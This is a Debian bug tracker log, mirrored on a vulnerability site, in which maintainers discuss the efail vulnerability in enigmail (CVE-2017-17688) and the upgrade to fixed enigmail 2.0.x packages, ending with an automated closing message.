Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

enigmail: efail attack against enigmail

Related Vulnerabilities: CVE-2017-17688  

Source

Debian Bug report logs - #898630
enigmail: efail attack against enigmail

version graph

Package: enigmail; Maintainer for enigmail is Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>; Source for enigmail is src:enigmail (PTS, buildd, popcon).

Reported by: Yves-Alexis Perez <corsac@debian.org>

Date: Mon, 14 May 2018 13:18:02 UTC

Severity: grave

Tags: security

Found in versions enigmail/2:1.9.9-2, enigmail/2:1.9.9-1~deb9u1, enigmail/2:1.9.8.1-1~deb8u1

Fixed in versions enigmail/2:2.0.4-1, enigmail/2:2.0.7-2

Done: Daniel Kahn Gillmor <dkg@fifthhorseman.net>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox

Report forwarded to debian-bugs-dist@lists.debian.org, Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>:
Bug#898630; Package enigmail. (Mon, 14 May 2018 13:18:04 GMT) (full text, mbox, link).

Acknowledgement sent to Yves-Alexis Perez <corsac@debian.org>:
New Bug report received and forwarded. Copy sent to Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>. (Mon, 14 May 2018 13:18:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Yves-Alexis Perez <corsac@debian.org>
To: team@security.debian.org
Subject: enigmail: efail attack against enigmail
Date: Mon, 14 May 2018 15:15:26 +0200
Package: enigmail
Severity: grave
Tags: security
Justification: user security hole

Hi Daniel,

in case you haven't already heard about it by now, a vulnerability has
been published against S/MIME and PGP/MIME in various email clients,
including thunderbird (and enigmail).

I'm unsure if CVE-2017-17688 (OpenPGP CFB gadget attacks) applies
to Thunderbird/enigmail or only GnuPG, but the PGP/MIME vulnerability
does apply to enigmail.

Some fixes apparently went in to enigmail 2.0.0 but I'm unsure which of
them yet, so any pointers appreciated (for example by closing with the
correct version number :).

I think we'll likely want to release a DSA too.

Regards,
-- 
Yves-Alexis

-- System Information:
Debian Release: buster/sid
  APT prefers unstable-debug
  APT policy: (500, 'unstable-debug'), (500, 'unstable'), (450, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.16.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=fr_FR.utf8, LC_CTYPE=fr_FR.utf8 (charmap=UTF-8), LANGUAGE=fr_FR.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages enigmail depends on:
ii  gnupg                    2.2.5-1
ii  gpg-agent [gnupg-agent]  2.2.5-1
pn  thunderbird | icedove    <none>

Versions of packages enigmail recommends:
ii  pinentry-gnome3 [pinentry-x11]  1.1.0-1+b1
ii  pinentry-gtk2 [pinentry-x11]    1.1.0-1+b1

enigmail suggests no packages.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>:
Bug#898630; Package enigmail. (Tue, 15 May 2018 20:33:06 GMT) (full text, mbox, link).

Acknowledgement sent to David Sanders <david@sandersweb.net>:
Extra info received and forwarded to list. Copy sent to Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>. (Tue, 15 May 2018 20:33:06 GMT) (full text, mbox, link).

Message #10 received at 898630@bugs.debian.org (full text, mbox, reply):

From: David Sanders <david@sandersweb.net>
To: 898630@bugs.debian.org
Subject: Re: enigmail: efail attack against enigmail
Date: Tue, 15 May 2018 16:31:17 -0400
I think this bug applies to Thunderbird as well as Enigmail and both 
packages need urgent updates.

The Enigmail part can be corrected by updating to version 2.0.3, but the 
user will still be vulnerable until a new version of Thunderbird is 
released and pushed out to users. Long term the openPGP standard needs 
to be updated to address the issue.

Could the maintainers of Enigmail take for action updating to the 
already released 2.0.3? And forwarding the bug to Thunderbird for 
further action?

Thanks,
David

On Mon, 14 May 2018 15:15:26 +0200 Yves-Alexis Perez <corsac@debian.org> 
wrote:
> Package: enigmail
> Severity: grave
> Tags: security
> Justification: user security hole
>
> Hi Daniel,
>
> in case you haven't already heard about it by now, a vulnerability has
> been published against S/MIME and PGP/MIME in various email clients,
> including thunderbird (and enigmail).
>
> I'm unsure if CVE-2017-17688 (OpenPGP CFB gadget attacks) applies
> to Thunderbird/enigmail or only GnuPG, but the PGP/MIME vulnerability
> does apply to enigmail.
>
> Some fixes apparently went in to enigmail 2.0.0 but I'm unsure which of
> them yet, so any pointers appreciated (for example by closing with the
> correct version number :).
>
> I think we'll likely want to release a DSA too.
>
> Regards,
> --
> Yves-Alexis

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>:
Bug#898630; Package enigmail. (Wed, 16 May 2018 11:57:03 GMT) (full text, mbox, link).

Acknowledgement sent to Carsten Schoenert <c.schoenert@t-online.de>:
Extra info received and forwarded to list. Copy sent to Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>. (Wed, 16 May 2018 11:57:03 GMT) (full text, mbox, link).

Message #15 received at 898630@bugs.debian.org (full text, mbox, reply):

From: Carsten Schoenert <c.schoenert@t-online.de>
To: David Sanders <david@sandersweb.net>
Cc: 898630@bugs.debian.org
Subject: Re: Bug#898630: enigmail: efail attack against enigmail
Date: Wed, 16 May 2018 13:47:45 +0200
Am 15.05.2018 um 22:31 schrieb David Sanders:
> I think this bug applies to Thunderbird as well as Enigmail and both 
> packages need urgent updates.

...

> Could the maintainers of Enigmail take for action updating to the 
> already released 2.0.3? And forwarding the bug to Thunderbird for 
> further action?

For Thunderbird there is a separate issue created.

https://bugs.debian.org/898631

I guess the "only" problem with enigmail is the recent package version
isn't available in unstable/testing. The main issue of Efail in Enigmail
is fixed since Enigmail 2.0.0

https://sourceforge.net/p/enigmail/forum/announce/thread/527a26fc/

-- 
Regards
Carsten Schoenert

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>:
Bug#898630; Package enigmail. (Sat, 19 May 2018 20:03:02 GMT) (full text, mbox, link).

Acknowledgement sent to Carsten Schoenert <c.schoenert@t-online.de>:
Extra info received and forwarded to list. Copy sent to Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>. (Sat, 19 May 2018 20:03:02 GMT) (full text, mbox, link).

Message #20 received at 898630@bugs.debian.org (full text, mbox, reply):

From: Carsten Schoenert <c.schoenert@t-online.de>
To: Daniel Kahn Gillmor <dkg@fifthhorseman.net>
Cc: 898630@bugs.debian.org
Subject: Re: Bug#898630: enigmail: efail attack against enigmail
Date: Sat, 19 May 2018 21:59:58 +0200
Hello Daniel,

On Wed, May 16, 2018 at 01:47:45PM +0200, Carsten Schoenert wrote:
 
> I guess the "only" problem with enigmail is the recent package version
> isn't available in unstable/testing. The main issue of Efail in Enigmail
> is fixed since Enigmail 2.0.0
> 
> https://sourceforge.net/p/enigmail/forum/announce/thread/527a26fc/

while MiniDebConf in Hamburg I was playing around with the current
enigmail package from experimental with Thunderbird 52.7.0 and also with
52.8.0. It works well so far and I haven't found any issues. I think
it's save to do a upload of Enigmail 2.0.4 also to unstable.

Moritz also mentioned that we should not fall into the same trap as by
introducing Thunderbird ESR52 months ago and be prepared by getting
Enigmail into the security releases before we start to introduce the
Thunderbird 60 packages into stable-security. I think there is a low
risk as I can't see a real problem with Enigmail on TB 52.x, also other
participants of the MiniDebConf have not seen problems regarding to
Enigmail 2.x with Thunderbird 52.x.

-- 
Regards
Carsten Schoenert

Marked as found in versions enigmail/2:1.9.9-2. Request was from intrigeri <intrigeri@debian.org> to control@bugs.debian.org. (Sun, 27 May 2018 08:03:06 GMT) (full text, mbox, link).

Marked as fixed in versions enigmail/2:2.0.4-1. Request was from intrigeri <intrigeri@debian.org> to control@bugs.debian.org. (Sun, 27 May 2018 08:03:08 GMT) (full text, mbox, link).

Marked as found in versions enigmail/2:1.9.9-1~deb9u1. Request was from intrigeri <intrigeri@debian.org> to control@bugs.debian.org. (Sun, 27 May 2018 08:03:10 GMT) (full text, mbox, link).

Marked as found in versions enigmail/2:1.9.8.1-1~deb8u1. Request was from intrigeri <intrigeri@debian.org> to control@bugs.debian.org. (Sun, 27 May 2018 08:03:13 GMT) (full text, mbox, link).

Reply sent to Daniel Kahn Gillmor <dkg@fifthhorseman.net>:
You have taken responsibility. (Thu, 14 Jun 2018 17:25:42 GMT) (full text, mbox, link).

Notification sent to Yves-Alexis Perez <corsac@debian.org>:
Bug acknowledged by developer. (Thu, 14 Jun 2018 17:25:42 GMT) (full text, mbox, link).

Message #33 received at 898630-close@bugs.debian.org (full text, mbox, reply):

From: Daniel Kahn Gillmor <dkg@fifthhorseman.net>
To: 898630-close@bugs.debian.org
Subject: Bug#898630: fixed in enigmail 2:2.0.7-2
Date: Thu, 14 Jun 2018 17:20:38 +0000
Source: enigmail
Source-Version: 2:2.0.7-2

We believe that the bug you reported is fixed in the latest version of
enigmail, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 898630@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Daniel Kahn Gillmor <dkg@fifthhorseman.net> (supplier of updated enigmail package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Thu, 14 Jun 2018 13:06:56 -0400
Source: enigmail
Binary: enigmail
Architecture: source
Version: 2:2.0.7-2
Distribution: unstable
Urgency: medium
Maintainer: Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>
Changed-By: Daniel Kahn Gillmor <dkg@fifthhorseman.net>
Description:
 enigmail   - GPG support for Thunderbird and Debian Icedove
Closes: 888897 898630
Changes:
 enigmail (2:2.0.7-2) unstable; urgency=medium
 .
   * acknowledge accidental move to unstable (oops)
     (closes: #888897, #898630)
   * skip unit tests for now, since they cause build failures
Checksums-Sha1:
 1304828cd34ec02a93b88f867291cc313b404d52 1774 enigmail_2.0.7-2.dsc
 0bf61b7fc0f9256f7a9c5c5bec847d4879613887 140120 enigmail_2.0.7-2.debian.tar.xz
 c66979da7b8af7cfbebaa680062700192aaa7782 11387 enigmail_2.0.7-2_amd64.buildinfo
Checksums-Sha256:
 d580f7d6440b6537d84233aa779b8918e6885bccd04d666d29c45ea048a77232 1774 enigmail_2.0.7-2.dsc
 66fa3adfd8eee0931bd447ef9cdccaa1605449929c4de8266d22bcebf0c4f3ee 140120 enigmail_2.0.7-2.debian.tar.xz
 42a0de22b357a25037ec070fee352f04cdc3d428534589b8cc898be742af33fd 11387 enigmail_2.0.7-2_amd64.buildinfo
Files:
 de95a2990b964580cc38a35b91bc0d23 1774 mail optional enigmail_2.0.7-2.dsc
 b515479c2b761c1fe827642959a43cdc 140120 mail optional enigmail_2.0.7-2.debian.tar.xz
 e7fbdbd805a5c4bef551f66a0c30c375 11387 mail optional enigmail_2.0.7-2_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQTTaP514aqS9uSbmdJsHx7ezFD6UwUCWyKhugAKCRBsHx7ezFD6
UxPiAP94Ke9WRB9ns45h8k/yxMeDFiqgpuBgXC5kPtBLAVUp+QD/QiN6ZosaJ0/X
mFjiFHtyXtcjmN8mRGLUVxe7Dwpv5wM=
=qG5D
-----END PGP SIGNATURE-----

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 11 Nov 2018 07:28:36 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 15:05:53 2019; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started